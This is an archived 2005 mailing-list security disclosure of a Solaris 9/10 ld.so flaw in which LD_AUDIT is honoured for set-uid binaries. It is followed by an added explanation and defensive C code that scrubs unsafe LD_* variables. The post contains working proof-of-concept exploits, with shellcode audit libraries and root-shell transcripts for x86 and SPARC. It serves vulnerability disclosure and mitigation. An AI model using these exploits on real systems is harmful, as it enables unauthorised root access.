Solaris 9/10 ld.so fun

From: Przemyslaw Frasunek (venglin_at_freebsd.lublin.pl)
Date: 06/28/05

    Date: Tue, 28 Jun 2005 01:11:58 +0200
    To: full-disclosure@lists.grok.org.uk, bugtraq@securityfocus.com

    ld.so from Solaris 9 and 10 doesn't check the LD_AUDIT environment variable when
    running s[ug]id binaries, allowing arbitrary code to be run with elevated
    privileges. Well, I can't believe that such a trivial vulnerability exists in a
    modern OS...

    The following PoC code was tested on:

    - SunOS 5.10 Generic i86pc i386 i86pc
    - SunOS 5.9 Generic_112233-12 sun4u

    It does NOT work on:

    SunOS 5.8 Generic_117350-02 sun4u sparc

    Example on unpatched Solaris 10 (AMD64):

    atari:venglin:~> cat dupa.c
    static char sh[] =
    "\x31\xc0\xeb\x09\x5a\x89\x42\x01\x88\x42\x06\xeb\x0d\xe8\xf2\xff\xff\xff\x9a\x01\x01\x01\x01\x07\x01\xc3\x50\xb0\x17\xe8\xf0\xff\xff\xff\x31\xc0\x68\x2f\x73\x68\x5f\x68\x2f\x62\x69\x6e\x88\x44\x24\x07\x89\xe3\x50\x53\x8d\x0c\x24\x8d\x54\x24\x04\x52\x51\x53\xb0\x0b\xe8\xcb\xff\xff\xff";

    int la_version() {
            void (*f)();
            f = (void*)sh;
            f();
            return 3;
    }
    atari:venglin:~> gcc -fPIC -shared -o /tmp/dupa.so dupa.c
    atari:venglin:~> setenv LD_AUDIT /tmp/dupa.so
    atari:venglin:~> su
    # id
    uid=0(root) gid=10(staff)

    Solaris 9 on SPARC:

    $ cat dupa.c
    char sh[] =
    /* setuid() */
    "\x90\x08\x3f\xff\x82\x10\x20\x17\x91\xd0\x20\x08"
    /* execve() */
    "\x20\xbf\xff\xff\x20\xbf\xff\xff\x7f\xff\xff\xff\x90\x03\xe0\x20"
    "\x92\x02\x20\x10\xc0\x22\x20\x08\xd0\x22\x20\x10\xc0\x22\x20\x14"
    "\x82\x10\x20\x0b\x91\xd0\x20\x08/bin/ksh";

    int la_version() {
            void (*f)();
            f = (void*)sh;
            f();
            return 3;
    }

    $ gcc -fPIC -shared -o /tmp/dupa.so dupa.c
    $ export LD_AUDIT=/tmp/dupa.so
    $ ping
    # id
    uid=0(root) gid=100(student)

    -- 
    * Fido: 2:480/124 ** WWW: http://www.frasunek.com/ ** NICHDL: PMF9-RIPE *
    * JID: venglin@jabber.atman.pl ** PGP ID: 2578FCAD ** HAM-RADIO: SQ8JIV *
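
The flaw reported above is that the runtime linker honours LD_AUDIT even when the process is running with privilege its caller did not have. The standard mitigation, which a secure-mode loader applies before consulting any LD_* variable, is to drop the unsafe entries from the environment once it has decided the process is privileged. The block below is an added illustration of that check; it is not Solaris ld.so code and not the poster's, and the variable list, scrub_env and secure_mode are assumptions made for the example.

```c
#include <stdio.h>
#include <string.h>

/* Variables a runtime linker must not honour when the process holds
 * privilege it did not inherit from its caller (set-uid/set-gid).
 * Illustrative list for this example, not Solaris ld.so's own table. */
static const char *const unsafe_prefixes[] = {
    "LD_AUDIT=", "LD_PRELOAD=", "LD_LIBRARY_PATH=", "LD_PROFILE=", NULL
};

/* Return 1 if this "NAME=value" entry names a variable that must be
 * ignored in secure mode. */
static int is_unsafe(const char *entry) {
    for (const char *const *p = unsafe_prefixes; *p; p++)
        if (strncmp(entry, *p, strlen(*p)) == 0)
            return 1;
    return 0;
}

/* Decide secure mode the way a loader should: the real and effective
 * ids differ. The decision must come from the kernel/credentials,
 * never from anything the caller can set in the environment. */
int secure_mode(unsigned uid, unsigned euid, unsigned gid, unsigned egid) {
    return uid != euid || gid != egid;
}

/* Remove unsafe entries in place from a NULL-terminated envp when
 * `secure` is set. Returns the number of entries dropped. */
int scrub_env(char **envp, int secure) {
    int dropped = 0;
    if (!secure)
        return 0;
    char **out = envp;
    for (char **in = envp; *in; in++) {
        if (is_unsafe(*in)) {
            dropped++;           /* skip it: never reaches the linker */
            continue;
        }
        *out++ = *in;
    }
    *out = NULL;
    return dropped;
}

int main(void) {
    /* Constructed sample environment for a uid 1000 user exec'ing a
     * set-uid-root binary (euid 0). */
    char *env[] = {
        "PATH=/usr/bin", "LD_AUDIT=/tmp/dupa.so",
        "HOME=/home/user", "LD_PRELOAD=/tmp/x.so", NULL
    };
    int n = scrub_env(env, secure_mode(1000, 0, 10, 10));
    printf("dropped %d unsafe variable(s)\n", n);
    for (char **e = env; *e; e++)
        printf("  kept: %s\n", *e);
    return 0;
}
```

The vulnerable behaviour in the post corresponds to calling the loader's audit setup without scrub_env having run (or with secure_mode always returning 0); the fix is simply that the scrub is unconditional whenever the credential check says the process is privileged.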
    
